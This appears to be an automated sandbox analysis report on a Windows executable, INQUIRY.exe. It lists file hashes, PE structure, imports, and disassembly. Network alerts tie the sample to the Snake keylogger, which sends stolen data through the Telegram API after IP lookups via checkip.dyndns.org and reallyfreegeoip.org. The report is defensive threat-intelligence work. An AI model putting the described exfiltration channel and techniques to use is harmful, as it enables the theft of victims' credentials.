                                                                                            Preview:...0MH3Q=U3P..Z4.ILODRZJ.0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ4.ILOJM.DX.G...8..q.+3G.9> # ;'xS/&]>MuQ5i1/Z. "o...j5_*-.\4_.PICZ44I$_..v;.Nb9./.$..{`%J.8.1O..4sA.6. .+o!.=h.Z7P>.,hi1N.9./.vH.d2.Jf /'h#.4X0NH3Q9U3PICZ44I.u1.ZJX0..3QuT7P=.Zd4ILODRZJ.0mI8P0U3.HCZ.5ILODRu.X0NX3Q9.2PIC.44YLODPZJ]0NH3Q9U6PICZ44IL.GRZNX0.s1Q;U3.ICJ44YLODRJJX NH3Q9U#PICZ44ILODR._Z0.H3Q951P.R[44ILODRZJX0NH3Q9U3PICZ44I..ERFJX0NH3Q9U3PICZ44ILODRZJX0NH.\;UsPICZ44ILODRZ.Y0.I3Q9U3PICZ44ILODRZJX0NH3Q9U.$,;.44IT.ERZZX0N.2Q9Q3PICZ44ILODRZJx0N(.#]4G1IC.Y4IL.ERZ$X0N.2Q9U3PICZ44ILO.RZ.vT/<RQ9U.`ICZ.6ILYDRZ@Z0NH3Q9U3PICZ4tIL.j )8;0NH.@8U30KCZ&5ILoFRZJX0NH3Q9U3P.CZt4ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U3PICZ44ILODRZJX0NH3Q9U

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.050074996630016
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:INQUIRY.exe
                                                                                            File size:1'091'584 bytes
                                                                                            MD5:ba7b76b0763b1488a2aee0892bdbbf12
                                                                                            SHA1:630f66e0cde7e6830c24f51afc7f811c422a4ca7
                                                                                            SHA256:7d0dd6fef8949eb3e2a88946865f6c8cdd4444ea224a99caa547f3ce68cf5299
                                                                                            SHA512:a72f4cfedc1788c5856ee204b17dd63121103745a99a56a9816602ffe087f2413e6f31c52ad8b104b6cd136f728d5df5ecc8fbb0a99c18651fedf8f5ecf3aa87
                                                                                            SSDEEP:24576:Ku6J33O0c+JY5UZ+XC0kGso6Fa551JrczeXcwC8/WY:8u0c++OCvkGs9Fa5fJD4HY
                                                                                            TLSH:1D35BE2273DDC360CB669173BF69B7016EBF7C614630B85B2F880D7DA950162162DBA3
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                            File Icon

                                                                                            Icon Hash:aaf3e3e3938382a0

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x427dcd
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x676C9E6D [Thu Dec 26 00:08:13 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            call 00007F2530535B9Ah
                                                                                            jmp 00007F2530528964h
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push edi
                                                                                            push esi
                                                                                            mov esi, dword ptr [esp+10h]
                                                                                            mov ecx, dword ptr [esp+14h]
                                                                                            mov edi, dword ptr [esp+0Ch]
                                                                                            mov eax, ecx
                                                                                            mov edx, ecx
                                                                                            add eax, esi
                                                                                            cmp edi, esi
                                                                                            jbe 00007F2530528AEAh
                                                                                            cmp edi, eax
                                                                                            jc 00007F2530528E4Eh
                                                                                            bt dword ptr [004C31FCh], 01h
                                                                                            jnc 00007F2530528AE9h
                                                                                            rep movsb
                                                                                            jmp 00007F2530528DFCh
                                                                                            cmp ecx, 00000080h
                                                                                            jc 00007F2530528CB4h
                                                                                            mov eax, edi
                                                                                            xor eax, esi
                                                                                            test eax, 0000000Fh
                                                                                            jne 00007F2530528AF0h
                                                                                            bt dword ptr [004BE324h], 01h
                                                                                            jc 00007F2530528FC0h
                                                                                            bt dword ptr [004C31FCh], 00000000h
                                                                                            jnc 00007F2530528C8Dh
                                                                                            test edi, 00000003h
                                                                                            jne 00007F2530528C9Eh
                                                                                            test esi, 00000003h
                                                                                            jne 00007F2530528C7Dh
                                                                                            bt edi, 02h
                                                                                            jnc 00007F2530528AEFh
                                                                                            mov eax, dword ptr [esi]
                                                                                            sub ecx, 04h
                                                                                            lea esi, dword ptr [esi+04h]
                                                                                            mov dword ptr [edi], eax
                                                                                            lea edi, dword ptr [edi+04h]
                                                                                            bt edi, 03h
                                                                                            jnc 00007F2530528AF3h
                                                                                            movq xmm1, qword ptr [esi]
                                                                                            sub ecx, 08h
                                                                                            lea esi, dword ptr [esi+08h]
                                                                                            movq qword ptr [edi], xmm1
                                                                                            lea edi, dword ptr [edi+08h]
                                                                                            test esi, 00000007h
                                                                                            je 00007F2530528B45h
                                                                                            bt esi, 03h
                                                                                            jnc 00007F2530528B98h

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [ASM] VS2013 build 21005
                                                                                            • [ C ] VS2013 build 21005
                                                                                            • [C++] VS2013 build 21005
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            • [ASM] VS2013 UPD4 build 31101
                                                                                            • [RES] VS2013 build 21005
                                                                                            • [LNK] VS2013 UPD4 build 31101

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x41eb4.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1090000x711c.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0xc70000x41eb40x4200099b61265119403e58ec1b6b503fb1b26False0.9000207149621212data7.829383341462867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x1090000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                            RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                            RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                            RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                            RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                            RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                            RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                            RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                            RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                            RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                            RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                            RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                            RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                            RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                            RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                            RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                            RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                            RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                            RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                            RT_RCDATA0xcf7b80x3917cdata1.0003463729196245
                                                                                            RT_GROUP_ICON0x1089340x76dataEnglishGreat Britain0.6610169491525424
                                                                                            RT_GROUP_ICON0x1089ac0x14dataEnglishGreat Britain1.25
                                                                                            RT_GROUP_ICON0x1089c00x14dataEnglishGreat Britain1.15
                                                                                            RT_GROUP_ICON0x1089d40x14dataEnglishGreat Britain1.25
                                                                                            RT_VERSION0x1089e80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                            RT_MANIFEST0x108ac40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                            Imports

                                                                                            DLLImport
                                                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                            UxTheme.dllIsThemeActive
                                                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishGreat Britain

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-12-26T02:45:16.025532+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731193.122.6.16880TCP
                                                                                            2024-12-26T02:45:25.025525+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731193.122.6.16880TCP
                                                                                            2024-12-26T02:45:26.543698+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449739149.154.167.220443TCP
                                                                                            2024-12-26T02:45:27.144850+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449739149.154.167.220443TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 26, 2024 02:45:02.341104984 CET4973180192.168.2.4193.122.6.168
                                                                                            Dec 26, 2024 02:45:02.460660934 CET8049731193.122.6.168192.168.2.4
                                                                                            Dec 26, 2024 02:45:02.460764885 CET4973180192.168.2.4193.122.6.168
                                                                                            Dec 26, 2024 02:45:02.461193085 CET4973180192.168.2.4193.122.6.168
                                                                                            Dec 26, 2024 02:45:02.580663919 CET8049731193.122.6.168192.168.2.4
                                                                                            Dec 26, 2024 02:45:13.397192955 CET8049731193.122.6.168192.168.2.4
                                                                                            Dec 26, 2024 02:45:13.401732922 CET4973180192.168.2.4193.122.6.168
                                                                                            Dec 26, 2024 02:45:13.521349907 CET8049731193.122.6.168192.168.2.4
                                                                                            Dec 26, 2024 02:45:15.982127905 CET8049731193.122.6.168192.168.2.4
                                                                                            Dec 26, 2024 02:45:16.025532007 CET4973180192.168.2.4193.122.6.168
                                                                                            Dec 26, 2024 02:45:16.330734015 CET49733443192.168.2.4172.67.177.134
                                                                                            Dec 26, 2024 02:45:16.330847979 CET44349733172.67.177.134192.168.2.4
                                                                                            Dec 26, 2024 02:45:16.330929995 CET49733443192.168.2.4172.67.177.134
                                                                                            Dec 26, 2024 02:45:16.340625048 CET49733443192.168.2.4172.67.177.134
                                                                                            Dec 26, 2024 02:45:16.340661049 CET44349733172.67.177.134192.168.2.4
                                                                                            Dec 26, 2024 02:45:17.558651924 CET44349733172.67.177.134192.168.2.4
                                                                                            Dec 26, 2024 02:45:17.558741093 CET49733443192.168.2.4172.67.177.134
                                                                                            Dec 26, 2024 02:45:17.564469099 CET49733443192.168.2.4172.67.177.134
                                                                                            Dec 26, 2024 02:45:17.564506054 CET44349733172.67.177.134192.168.2.4
                                                                                            Dec 26, 2024 02:45:17.564842939 CET44349733172.67.177.134192.168.2.4
                                                                                            Dec 26, 2024 02:45:17.606256008 CET49733443192.168.2.4172.67.177.134
                                                                                            Dec 26, 2024 02:45:17.616568089 CET49733443192.168.2.4172.67.177.134
                                                                                            Dec 26, 2024 02:45:17.659333944 CET44349733172.67.177.134192.168.2.4
                                                                                            Dec 26, 2024 02:45:18.000567913 CET44349733172.67.177.134192.168.2.4
                                                                                            Dec 26, 2024 02:45:18.000618935 CET44349733172.67.177.134192.168.2.4
                                                                                            Dec 26, 2024 02:45:18.000698090 CET49733443192.168.2.4172.67.177.134
                                                                                            Dec 26, 2024 02:45:18.006686926 CET49733443192.168.2.4172.67.177.134
                                                                                            Dec 26, 2024 02:45:23.131849051 CET4973180192.168.2.4193.122.6.168
                                                                                            Dec 26, 2024 02:45:23.251398087 CET8049731193.122.6.168192.168.2.4
                                                                                            Dec 26, 2024 02:45:24.981524944 CET8049731193.122.6.168192.168.2.4
                                                                                            Dec 26, 2024 02:45:25.025525093 CET4973180192.168.2.4193.122.6.168
                                                                                            Dec 26, 2024 02:45:25.123151064 CET49739443192.168.2.4149.154.167.220
                                                                                            Dec 26, 2024 02:45:25.123192072 CET44349739149.154.167.220192.168.2.4
                                                                                            Dec 26, 2024 02:45:25.123260975 CET49739443192.168.2.4149.154.167.220
                                                                                            Dec 26, 2024 02:45:25.123686075 CET49739443192.168.2.4149.154.167.220
                                                                                            Dec 26, 2024 02:45:25.123701096 CET44349739149.154.167.220192.168.2.4
                                                                                            Dec 26, 2024 02:45:26.489178896 CET44349739149.154.167.220192.168.2.4
                                                                                            Dec 26, 2024 02:45:26.489362001 CET49739443192.168.2.4149.154.167.220
                                                                                            Dec 26, 2024 02:45:26.493030071 CET49739443192.168.2.4149.154.167.220
                                                                                            Dec 26, 2024 02:45:26.493058920 CET44349739149.154.167.220192.168.2.4
                                                                                            Dec 26, 2024 02:45:26.493302107 CET44349739149.154.167.220192.168.2.4
                                                                                            Dec 26, 2024 02:45:26.502451897 CET49739443192.168.2.4149.154.167.220
                                                                                            Dec 26, 2024 02:45:26.543376923 CET44349739149.154.167.220192.168.2.4
                                                                                            Dec 26, 2024 02:45:26.543481112 CET49739443192.168.2.4149.154.167.220
                                                                                            Dec 26, 2024 02:45:26.543500900 CET44349739149.154.167.220192.168.2.4
                                                                                            Dec 26, 2024 02:45:27.144900084 CET44349739149.154.167.220192.168.2.4
                                                                                            Dec 26, 2024 02:45:27.144972086 CET44349739149.154.167.220192.168.2.4
                                                                                            Dec 26, 2024 02:45:27.145034075 CET49739443192.168.2.4149.154.167.220
                                                                                            Dec 26, 2024 02:45:27.145536900 CET49739443192.168.2.4149.154.167.220
                                                                                            Dec 26, 2024 02:46:29.981235027 CET8049731193.122.6.168192.168.2.4
                                                                                            Dec 26, 2024 02:46:29.984699011 CET4973180192.168.2.4193.122.6.168
                                                                                            Dec 26, 2024 02:46:58.010858059 CET4973180192.168.2.4193.122.6.168
                                                                                            Dec 26, 2024 02:46:58.130592108 CET8049731193.122.6.168192.168.2.4

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 26, 2024 02:45:02.197021961 CET5957653192.168.2.41.1.1.1
                                                                                            Dec 26, 2024 02:45:02.335547924 CET53595761.1.1.1192.168.2.4
                                                                                            Dec 26, 2024 02:45:16.019491911 CET5313653192.168.2.41.1.1.1
                                                                                            Dec 26, 2024 02:45:16.329998016 CET53531361.1.1.1192.168.2.4
                                                                                            Dec 26, 2024 02:45:24.985025883 CET6095453192.168.2.41.1.1.1
                                                                                            Dec 26, 2024 02:45:25.122526884 CET53609541.1.1.1192.168.2.4

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 26, 2024 02:45:02.197021961 CET192.168.2.41.1.1.10xb91dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                            Dec 26, 2024 02:45:16.019491911 CET192.168.2.41.1.1.10x9bb0Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                            Dec 26, 2024 02:45:24.985025883 CET192.168.2.41.1.1.10x686bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
